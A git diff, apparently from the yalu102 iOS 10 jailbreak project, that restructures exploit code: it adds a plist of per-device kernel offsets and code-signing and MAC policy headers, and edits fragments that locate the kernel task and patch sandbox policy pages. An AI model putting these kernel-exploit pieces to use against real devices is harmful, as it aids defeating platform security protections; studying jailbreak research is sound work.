PBXFileReference; lastKnownFileType = sourcecode.c.h; path = jailbreak.h; sourceTree = ""; }; + A70DFA9D1E3D332500769FE9 /* include */ = {isa = PBXFileReference; lastKnownFileType = folder; path = include; sourceTree = ""; }; + A70DFA9F1E3D338B00769FE9 /* mac_policy.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = mac_policy.h; sourceTree = ""; }; + A70DFAA01E3D35AC00769FE9 /* Kernels.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = Kernels.plist; sourceTree = ""; }; + A70DFAA21E3D8FAF00769FE9 /* csflags.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = csflags.h; sourceTree = ""; }; A72023711E3CFBCA00FADBFF /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = System/Library/Frameworks/IOKit.framework; sourceTree = SDKROOT; }; A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */ = {isa = PBXFileReference; lastKnownFileType = text.xcconfig; path = yalu102.xcconfig; sourceTree = ""; }; EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; @@ -42,15 +47,10 @@ EA9900F01E1E9F060056FEBD /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; EA9900F51E1E9F060056FEBD /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; EA9900F71E1E9F060056FEBD /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; - EA9901021E219C210056FEBD /* offsets.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = offsets.c; sourceTree = ""; }; - EA9901031E219C210056FEBD /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; }; EA9901051E219FF10056FEBD /* bootstrap.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = bootstrap.tar; sourceTree = ""; }; EA9901091E21A04C0056FEBD /* tar */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = tar; sourceTree = ""; }; EA99010B1E21A0520056FEBD /* launchctl */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = launchctl; sourceTree = ""; }; EA99010D1E21A1560056FEBD /* jailbreak.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = jailbreak.m; sourceTree = ""; }; - EA99010F1E21A1A00056FEBD /* pte_stuff.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = pte_stuff.h; sourceTree = ""; }; - EA9901151E21A1D90056FEBD /* devicesupport.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = devicesupport.h; sourceTree = ""; }; - EA9901161E21A1D90056FEBD /* devicesupport.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = devicesupport.m; sourceTree = ""; }; /* End PBXFileReference section */ /* Begin PBXFrameworksBuildPhase section */ @@ -107,6 +107,7 @@ EA9900E51E1E9F060056FEBD /* yalu102 */ = { isa = PBXGroup; children = ( + A70DFA9D1E3D332500769FE9 /* include */, EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */, A720236F1E3CFB3500FADBFF /* Resources */, EA9900E61E1E9F060056FEBD /* Supporting Files */, @@ -114,17 +115,16 @@ EA9900EF1E1E9F060056FEBD /* Main.storyboard */, EA9900E91E1E9F060056FEBD /* AppDelegate.h */, EA9900EA1E1E9F060056FEBD /* AppDelegate.m */, - EA9901151E21A1D90056FEBD /* devicesupport.h */, - EA9901161E21A1D90056FEBD /* devicesupport.m */, + A70DFAA21E3D8FAF00769FE9 /* csflags.h */, EA9900F71E1E9F060056FEBD /* Info.plist */, - EA99010D1E21A1560056FEBD /* jailbreak.m */, - EA9901021E219C210056FEBD /* offsets.c */, - EA9901031E219C210056FEBD /* offsets.h */, + A70DFAA01E3D35AC00769FE9 /* Kernels.plist */, + A70DFA9F1E3D338B00769FE9 /* mac_policy.h */, EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */, - EA99010F1E21A1A00056FEBD /* pte_stuff.h */, EA9900EC1E1E9F060056FEBD /* ViewController.h */, EA9900ED1E1E9F060056FEBD /* ViewController.m */, + A70DFA9C1E3D314F00769FE9 /* jailbreak.h */, + EA99010D1E21A1560056FEBD /* jailbreak.m */, ); path = yalu102; sourceTree = ""; @@ -169,6 +169,7 @@ TargetAttributes = { EA9900E21E1E9F060056FEBD = { CreatedOnToolsVersion = 8.2.1; + DevelopmentTeam = N3S4C3QL65; ProvisioningStyle = Automatic; }; }; @@ -201,7 +202,9 @@ EA9901061E219FF10056FEBD /* bootstrap.tar in Resources */, EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */, EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */, + A70DFAA11E3D35AC00769FE9 /* Kernels.plist in Resources */, EA1A3BAD1E399006009CA025 /* reload in Resources */, + A70DFA9E1E3D332500769FE9 /* include in Resources */, EA1A3BC51E39D1FF009CA025 /* Assets.xcassets in Resources */, EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */, ); @@ -231,8 +234,6 @@ isa = PBXSourcesBuildPhase; buildActionMask = 2147483647; files = ( - EA9901041E219C210056FEBD /* offsets.c in Sources */, - EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */, EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */, EA9900EB1E1E9F060056FEBD /* AppDelegate.m in Sources */, EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */, diff --git a/yalu102/AppDelegate.h b/yalu102/AppDelegate.h index ccd8022..b641ee4 100644 --- a/yalu102/AppDelegate.h +++ b/yalu102/AppDelegate.h @@ -12,6 +12,4 @@ @property (strong, nonatomic) UIWindow *window; - @end - diff --git a/yalu102/AppDelegate.m b/yalu102/AppDelegate.m index 8dfdc30..8807e94 100644 --- a/yalu102/AppDelegate.m +++ b/yalu102/AppDelegate.m @@ -14,38 +14,31 @@ @interface AppDelegate () @implementation AppDelegate - - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { // Override point for customization after application launch. return YES; } - - (void)applicationWillResignActive:(UIApplication *)application { // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. } - - (void)applicationDidEnterBackground:(UIApplication *)application { // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. } - - (void)applicationWillEnterForeground:(UIApplication *)application { // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. } - - (void)applicationDidBecomeActive:(UIApplication *)application { // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. } - - (void)applicationWillTerminate:(UIApplication *)application { // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. } - @end diff --git a/yalu102/Kernels.plist b/yalu102/Kernels.plist new file mode 100644 index 0000000..0e8413f --- /dev/null +++ b/yalu102/Kernels.plist @@ -0,0 +1,260 @@ + + + + + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010 + + allproc + 0x5EC178 + proc + 0x360 + rootvnode + 0x5F20B8 + + + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001 + + allproc + 0x5B0228 + proc + 0x360 + rootvnode + 0x5B60B8 + + + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000 + + allproc + 0x5b0168 + proc + 0x360 + rootvnode + 0x5b60b8 + + + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000 + + allproc + 0x5a4148 + proc + 0x360 + rootvnode + 0x5aa0b8 + + + + Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X + + allproc + 0x5a4128 + proc + 0x360 + rootvnode + 0x5aa0b8 + + + + Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X + + allproc + 0x5a4128 + proc + 0x360 + rootvnode + 0x5aa0b8 + + + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000 + + allproc + 0x5A4148 + proc + 0x360 + rootvnode + 0x5AA0B8 + + + + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000 + + allproc + 0x5A8438 + proc + 0x360 + rootvnode + 0x5AE0B8 + + + + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000 + + allproc + 0x5B8468 + proc + 0x360 + rootvnode + 0x5BE0b8 + + + + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X + + allproc + 0x5AC418 + proc + 0x360 + rootvnode + 0x5B20B8 + + + + Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010 + + allproc + 0x5EC478 + proc + 0x360 + rootvnode + 0x5F20B8 + + + + Darwin Kernel Version 16.1.0: Thu Sep 29 22:13:19 PDT 2016; root:xnu-3789.23.3~2/RELEASE_ARM64_T7000 + + allproc + 0x5B8168 + proc + 0x360 + rootvnode + 0x5BA0B8 + + + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010 + + allproc + 0x5EC178 + proc + 0x360 + rootvnode + 0x5F20B8 + + + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001 + + allproc + 0x5B4228 + proc + 0x360 + rootvnode + 0x5BA0B8 + + + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000 + + allproc + 0x5B4168 + proc + 0x360 + rootvnode + 0x5BA0B8 + + + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000 + + allproc + 0x5A4148 + proc + 0x360 + rootvnode + 0x5AA0B8 + + + + Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X + + allproc + 0x5A4128 + proc + 0x360 + rootvnode + 0x5AA0B8 + + + diff --git a/yalu102/Resources/reload b/yalu102/Resources/reload index 77afe86..0c97826 100755 --- a/yalu102/Resources/reload +++ b/yalu102/Resources/reload @@ -6,5 +6,4 @@ launchctl load /System/Library/LaunchDaemons/com.apple.logd.plist sleep 1 launchctl load /Library/LaunchDaemons launchctl load /System/Library/LaunchDaemons - exit 0 diff --git a/yalu102/ViewController.m b/yalu102/ViewController.m index 63328b3..ffe1fea 100644 --- a/yalu102/ViewController.m +++ b/yalu102/ViewController.m @@ -6,14 +6,12 @@ // Copyright © 2017 kimjongcracks. All rights reserved. // -#import "offsets.h" #import "ViewController.h" #import #import #import -#undef __IPHONE_OS_VERSION_MIN_REQUIRED #import -#include +#import extern uint64_t procoff; @@ -32,17 +30,16 @@ @implementation ViewController - (void)viewDidLoad { [super viewDidLoad]; + init_offsets(); + struct utsname u = { 0 }; uname(&u); - if (strstr(u.version, "MarijuanARM")) { [dope setEnabled:NO]; [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; } - - // Do any additional setup after loading the view, typically from a nib. } typedef natural_t not_natural_t; @@ -305,8 +302,7 @@ - (IBAction)yolo:(UIButton*)sender uint64_t allproc = allproc_offset + kernel_base; uint64_t proc_ = allproc; - - uint64_t myproc = 0; + uint64_t kernproc = 0; while (proc_) { @@ -321,15 +317,13 @@ - (IBAction)yolo:(UIButton*)sender *(uint64_t*) (faketask + procoff) = proc; pid_for_task(foundport, &pd); - if (pd == getpid()) { - myproc = proc; - } else if (pd == 0){ + if (pd == 0){ kernproc = proc; } + proc_ = proc; } - uint64_t kern_task = 0; *(uint64_t*) (faketask + procoff) = kernproc - 0x10 + 0x18; pid_for_task(foundport, (int32_t*)&kern_task); @@ -371,8 +365,9 @@ - (IBAction)yolo:(UIButton*)sender extern uint64_t slide; slide = kernel_base - 0xFFFFFFF007004000; - void exploit(void*, mach_port_t, uint64_t, uint64_t); - exploit(sender, pt, kernel_base, allproc_offset); + void yalu_jailbreak(mach_port_t, uint64_t, uint64_t); + exploit(pt, kernel_base, allproc_offset); + [dope setEnabled:NO]; [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; @@ -383,5 +378,4 @@ - (void)didReceiveMemoryWarning { // Dispose of any resources that can be recreated. } - @end diff --git a/yalu102/csflags.h b/yalu102/csflags.h new file mode 100644 index 0000000..d06e7a5 --- /dev/null +++ b/yalu102/csflags.h @@ -0,0 +1,26 @@ + +#pragma once + +#define CS_VALID 0x0000001 /* dynamically valid */ +#define CS_ADHOC 0x0000002 /* ad hoc signed */ +#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ +#define CS_INSTALLER 0x0000008 /* has installer entitlement */ +#define CS_HARD 0x0000100 /* don't load invalid pages */ +#define CS_KILL 0x0000200 /* kill process if it becomes invalid */ +#define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ +#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ +#define CS_ENFORCEMENT 0x0001000 /* require enforcement */ +#define CS_REQUIRE_LV 0x0002000 /* require library validation */ +#define CS_ENTITLEMENTS_VALIDATED 0x0004000 + +#define CS_ALLOWED_MACHO 0x00ffffe + +#define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ +#define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ +#define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ +#define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ + +#define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ +#define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ +#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ +#define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ diff --git a/yalu102/devicesupport.m b/yalu102/devicesupport.m deleted file mode 100644 index 7748444..0000000 --- a/yalu102/devicesupport.m +++ /dev/null @@ -1,50 +0,0 @@ -#import -#import "devicesupport.h" -#import -#import - - -NSMutableArray* consttable = nil; -NSMutableArray* collide = nil; -int constload() { - struct utsname uts; - uname(&uts); - if (strstr(uts.version, "Marijuan")) { - return -2; - } - - NSString* strv = [NSString stringWithUTF8String:uts.version]; - NSArray *dp =[[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"def" ofType:@"plist"]]; - int m = 0; - collide = [NSMutableArray new]; - - for (NSDictionary* dict in dp) { - if ([dict[@"vers"] isEqualToString:strv]) { - [collide setObject:[NSMutableArray new] atIndexedSubscript:m]; - int i = 0; - for (NSString* str in dict[@"val"]) { - [collide[m] setObject:[NSNumber numberWithUnsignedLongLong:strtoull([str UTF8String], 0, 0)] atIndexedSubscript:i]; - i++; - } - m++; - } - } - if (m) { - return 0; - } - return -1; -} -char affine_const_by_surfacevt(uint64_t surfacevt_slid) -{ - for (NSArray* arr in collide) { - if ((surfacevt_slid & (0xfffff)) == ([[arr objectAtIndex:1] unsignedLongLongValue] & 0xfffff)) { - NSLog(@"affined"); - consttable = arr; - return 0; - } - } - return -1; -} -uint64_t constget(int idx){ - return [[consttable objectAtIndex:idx] unsignedLongLongValue]; -} diff --git a/yalu102/jailbreak.h b/yalu102/jailbreak.h new file mode 100644 index 0000000..0e0f23c --- /dev/null +++ b/yalu102/jailbreak.h @@ -0,0 +1,7 @@ + +#pragma once + +#import +#import + +void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs); diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 64da483..85f0ac9 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -6,35 +6,29 @@ // Copyright © 2017 kimjongcracks. All rights reserved. // +#import "jailbreak.h" #import -#undef __IPHONE_OS_VERSION_MIN_REQUIRED -#import -#import "devicesupport.h" - #import #import #import -#import #import -#import - -#import "devicesupport.h" -#import #import #import -#import +#import #import #import #import - +#import +#import +#import +#import "mac_policy.h" #import "patchfinder64.h" - -#define vm_address_t mach_vm_address_t +#import "csflags.h" mach_port_t tfp0=0; uint64_t slide=0; io_connect_t funcconn=0; -// #define NSLog(...) + kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); @@ -95,7 +89,7 @@ uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) { #import "pte_stuff.h" -void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) +void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) { io_iterator_t iterator; IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"), &iterator); @@ -558,8 +552,7 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops); uint64_t nopag = sbops_end - sbops; - - int ctr = 0; + for (int i = 0; i < nopag; i+= PSZ) { RemapPage(((sbops + i) & (~PMK))); } @@ -616,7 +609,6 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) uint64_t nopag = sbops_end - sbops; - int ctr = 0; for (int i = 0; i < nopag; i+= PSZ) { RemapPage(((sbops + i) & (~PMK))); } @@ -784,8 +776,8 @@ void exploit(void* btn, mach_port_t pt, uint64_t kernbase, uint64_t allprocs) chmod("/Library/LaunchDaemons/0.reload.plist", 0644); chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); } - unlink("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist"); + //unlink("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist"); } } chmod("/private", 0777); diff --git a/yalu102/devicesupport.h b/yalu102/mac_policy.h similarity index 89% rename from yalu102/devicesupport.h rename to yalu102/mac_policy.h index 97bcf09..d5c7ece 100644 --- a/yalu102/devicesupport.h +++ b/yalu102/mac_policy.h @@ -1,41 +1,9 @@ -#ifndef devicesupport_h -#define devicesupport_h +#pragma once - -//0xFFFFFFF0075F6000+0x50 (0xfffffff006e4d620+0x4bc0) - -#define G(type) constget(type) -#define S(type, val) constset(type,val) - -#define CS_VALID 0x0000001 /* dynamically valid */ -#define CS_ADHOC 0x0000002 /* ad hoc signed */ -#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ -#define CS_INSTALLER 0x0000008 /* has installer entitlement */ - -#define CS_HARD 0x0000100 /* don't load invalid pages */ -#define CS_KILL 0x0000200 /* kill process if it becomes invalid */ -#define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ -#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ -#define CS_ENFORCEMENT 0x0001000 /* require enforcement */ -#define CS_REQUIRE_LV 0x0002000 /* require library validation */ -#define CS_ENTITLEMENTS_VALIDATED 0x0004000 - -#define CS_ALLOWED_MACHO 0x00ffffe - -#define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ -#define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ -#define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ -#define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ - -#define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ -#define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ -#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ -#define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ - -uint64_t constget(int idx); #import -struct mac_policy_ops{ + +struct mac_policy_ops { uint64_t mpo_audit_check_postselect; uint64_t mpo_audit_check_preselect; uint64_t mpo_bpfdesc_label_associate; @@ -372,7 +340,3 @@ struct mac_policy_ops{ uint64_t mpo_iokit_check_filter_properties; uint64_t mpo_iokit_check_get_property; }; - - - -#endif /* devicesupport_h */ diff --git a/yalu102/offsets.c b/yalu102/offsets.c deleted file mode 100644 index 8d4fb23..0000000 --- a/yalu102/offsets.c +++ /dev/null @@ -1,103 +0,0 @@ -#include -#include -#include -#include - -#include "offsets.h" - -uint64_t allproc_offset; -uint64_t kernproc_offset; -uint64_t procoff; -uint64_t rootvnode_offset; - -void init_offsets() { - struct utsname u = { 0 }; - uname(&u); - - printf("sysname: %s\n", u.sysname); - printf("nodename: %s\n", u.nodename); - printf("release: %s\n", u.release); - printf("version: %s\n", u.version); - printf("machine: %s\n", u.machine); - - allproc_offset = 0x5a4148; - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; - - if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000") == 0) { - allproc_offset = 0x5a4148; - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; - } else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000") == 0) { - allproc_offset = 0x5a8438; - procoff = 0x360; // iPhone 6s/iPad pro (?), 10.2 - rootvnode_offset = 0x5ae0b8; - } else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000") == 0) { - allproc_offset = 0x5b8468; - procoff = 0x360; // iPhone 6, 10.2, credit to @Andywiik - rootvnode_offset = 0x5be0b8; - } else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001") == 0) { - allproc_offset = 0x5b8528; - procoff = 0x360; // iPad air 2 (wifi), 10.2, @nicogibbons (github) - rootvnode_offset = 0x5be0b8; - } else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X") == 0) { - allproc_offset = 0x5ac418; - procoff = 0x360; // iPhone 5s, 10.2, @jtv7 (github) - rootvnode_offset = 0x5b60b8; - } else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010") == 0) { - allproc_offset = 0x5ec478; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5f20b8; /* @Mila432 */ - } else if (strstr(u.machine, "AppleTV5,3") && strstr(u.version, "root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X")) { //Using Ian's condition, not having my AppleTV nearby - allproc_offset = 0x5b8168; - procoff = 0x360; // tvOS 10.0.1 (14U71) @onchehuh (github) - rootvnode_offset = 0x5ba0b8; - } else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X") == 0){ - allproc_offset = 0x5a4128; - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; - } else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010") == 0) { - allproc_offset = 0x5ec178; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5f20b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001") == 0) { - allproc_offset = 0x5b4228; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5ba0b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000") == 0) { - allproc_offset = 0x5b4168; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5ba0b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000") == 0) { - allproc_offset = 0x5a4148; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X") == 0) { - allproc_offset = 0x5a4128; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010") == 0) { - allproc_offset = 0x5ec178; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5f20b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001") == 0) { - allproc_offset = 0x5b0228; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5b60b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000") == 0) { - allproc_offset = 0x5b0168; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5b60b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000") == 0) { - allproc_offset = 0x5a4148; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; /* @Mila432 */ - } else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X") == 0) { - allproc_offset = 0x5a4128; /* @Mila432 */ - procoff = 0x360; - rootvnode_offset = 0x5aa0b8; /* @Mila432 */ - } else { - printf("missing offset, prob crashing\n"); - } - -} diff --git a/yalu102/offsets.h b/yalu102/offsets.h deleted file mode 100644 index 4e6e8d3..0000000 --- a/yalu102/offsets.h +++ /dev/null @@ -1,37 +0,0 @@ -#ifndef offsets_h -#define offsets_h - -#import - -// offsets from the main kernel 0xfeedfacf -extern uint64_t allproc_offset; -extern uint64_t kernproc_offset; - -// offsets in struct proc -extern uint64_t struct_proc_p_pid_offset; -extern uint64_t struct_proc_task_offset; -extern uint64_t struct_proc_p_uthlist_offset; -extern uint64_t struct_proc_p_ucred_offset; -extern uint64_t struct_proc_p_comm_offset; - -// offsets in struct kauth_cred -extern uint64_t struct_kauth_cred_cr_ref_offset; - -// offsets in struct uthread -extern uint64_t struct_uthread_uu_ucred_offset; -extern uint64_t struct_uthread_uu_list_offset; - -// offsets in struct task -extern uint64_t struct_task_ref_count_offset; -extern uint64_t struct_task_itk_space_offset; - -// offsets in struct ipc_space -extern uint64_t struct_ipc_space_is_table_offset; - -// offsets in struct ipc_port -extern uint64_t struct_ipc_port_ip_kobject_offset; - -void init_offsets(); -extern uint64_t rootvnode_offset; - -#endif diff --git a/yalu102/patchfinder64.h b/yalu102/patchfinder64.h index a6909af..23edd52 100644 --- a/yalu102/patchfinder64.h +++ b/yalu102/patchfinder64.h @@ -5,30 +5,29 @@ // Copyright © 2016 qwertyoruiop. All rights reserved. // -#ifndef patchfinder64_h -#define patchfinder64_h +#pragma once #import -extern uint64_t text_exec_base; -extern uint64_t text_exec_size; +extern uint64_t text_exec_base; +extern uint64_t text_exec_size; -extern uint64_t prelink_exec_base; -extern uint64_t prelink_exec_size; +extern uint64_t prelink_exec_base; +extern uint64_t prelink_exec_size; extern uint64_t whole_base; extern uint64_t whole_size; extern uint8_t* whole_dump; extern uint64_t 